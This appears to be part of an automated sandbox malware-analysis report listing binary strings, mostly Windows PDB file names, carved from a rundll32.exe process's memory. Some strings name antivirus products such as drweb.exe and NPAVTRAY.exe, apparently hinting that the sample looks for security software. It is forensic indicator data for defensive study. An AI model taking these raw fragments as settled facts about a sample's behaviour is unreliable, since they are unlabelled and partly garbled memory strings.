    Source: Binary string: UxTheme.pdbSecurityodee source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnsapi.pdbedlogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"i source: rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 67b6bcd000","debug_file":"oleaut32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\msvcp_win.dll","arch" source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Nvcoas.exemagehlp.pdb"},jM source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: fwpuclnt.pdbcurityToolsj source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":"p source: rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: oleaut32.pdbeExtensions source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: combase.pdbto ServerRsx source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: userenv.pdbEksizeh source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 000" bug_file":"combase.pdb"},{"type":"symbolic",] source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: advapi32.pdbtione source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: iphlpapi.pdbrityupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbeionionport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: bcrypt.pdbexee 6er# source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: secur32.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedonvice.exe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: _id":"28e89a43c000","debug_file":"cryptbase.pdb"},{"type source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sechost.pdbEe source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ws2_32.pdbnmentSupported source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kernelbase.pdbrrorCodeO| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: NPAVTRAY.execomn.pdb"},{ source: rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemsvc.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imagehlp.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 9cd10f033ef5-1","code_id":"ce95420b156000","debug_file":"crypt32.pdb"},{"type":"symbolic","name":"C:\\Windows\\System32\\bcrypt.dll","arch":null,"image_addr":"0x7ffdb23N4 source: rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbitysNameSDOmw== source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdbEe* FRR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: PAVPROXY.exeore.pdb"},{"\M source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: sspicli.pdbecurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tdll.pdb"},{"type":" source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: drweb.exeore.pdb" source: rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ole32.pdbEXErorData source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CLBCatQ.pdbnationcanner source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: JiangminAVandFWves.pdb"} source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemcomn.pdbentSupported| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdblogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Amsi.pdb source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport^ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdb source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: SpywareDoctorox.pdb"},{"Bs source: rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp
